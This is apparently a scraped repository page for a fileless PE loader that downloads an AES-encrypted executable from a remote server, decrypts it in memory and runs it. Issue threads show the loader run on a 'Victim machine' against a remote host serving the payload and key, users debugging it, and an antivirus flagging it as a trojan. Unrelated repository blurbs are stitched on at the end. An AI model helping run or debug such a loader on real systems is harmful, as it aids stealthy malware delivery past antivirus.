Loading Remote AES Encrypted PE in memory , Decrypted it and run it
- hashlib
- pycryptodome
- pycryptodomex
Loading Remote AES Encrypted PE in memory , Decrypted it and run it
License: MIT License
Loading Remote AES Encrypted PE in memory , Decrypted it and run it
Hello, I've got some problems with decrypt and execute into memory
This is my console output on Victim machine
FilelessPELoader.exe myremoteserverip 8888 cihper.bin key.bin
[+] Get AES Encrypted PE from myremoteserverip:8888
[+] Get AES Key from myremoteserverip:8888
[+] AES PE Address : 000002679DF64CC0
[+] AES Key Address : 000002679DF446A0
[+] Decrypt the PE
Failed in CryptDecrypt (2148073477)
[+] PE Decrypted
[+] Loading and Running PE
On server side I've got this
python3 -m http.server 8888
Serving HTTP on 0.0.0.0 port 8888 (http://0.0.0.0:8888/) ...
xxx.xxx.8.36 - - [31/Mar/2023 07:38:39] code 404, message File not found
xxx.xxx.8.36 - - [31/Mar/2023 07:38:39] "GET /cihper.bin HTTP/1.1" 404 -
xxx.xxx.8.36 - - [31/Mar/2023 07:38:39] "GET /key.bin HTTP/1.1" 200 -
but all required files into one folder. Actually I've already tested it and it worked for me but I deleted my VM...
Could u help me to solve this problem?
I was tested in on Python 3.8.10, Python 3.10.6. OS ubuntu 22 and Windows server 2016
Thanks in advanced!
Hi,
I'm loading a very simple PE file using this loader that only prints hello world but once loaded with this loaded it never returns?
The executable is loaded and i get the output on the screen but it never returns to prompt, or my printf() line after the pe is loaded and executed from memory never gets executed!
How can I make this to return properly once the loaded .exe file is returned?
Thanks
on windows10pro updated 21 march 2023. :-((
it say : Trojan:Script/Wacatac.B!ml
Please add a requirements.txt
file with the following :
hashlib
pycryptodome
pycryptodomex
A declarative, efficient, and flexible JavaScript library for building user interfaces.
๐ Vue.js is a progressive, incrementally-adoptable JavaScript framework for building UI on the web.
TypeScript is a superset of JavaScript that compiles to clean JavaScript output.
An Open Source Machine Learning Framework for Everyone
The Web framework for perfectionists with deadlines.
A PHP framework for web artisans
Bring data to life with SVG, Canvas and HTML. ๐๐๐
JavaScript (JS) is a lightweight interpreted programming language with first-class functions.
Some thing interesting about web. New door for the world.
A server is a program made to process requests and deliver data to clients.
Machine learning is a way of modeling and interpreting data that allows a piece of software to respond intelligently.
Some thing interesting about visualization, use data art
Some thing interesting about game, make everyone happy.
We are working to build community through open source technology. NB: members must have two-factor auth.
Open source projects and samples from Microsoft.
Google โค๏ธ Open Source for everyone.
Alibaba Open Source for everyone
Data-Driven Documents codes.
China tencent open source team.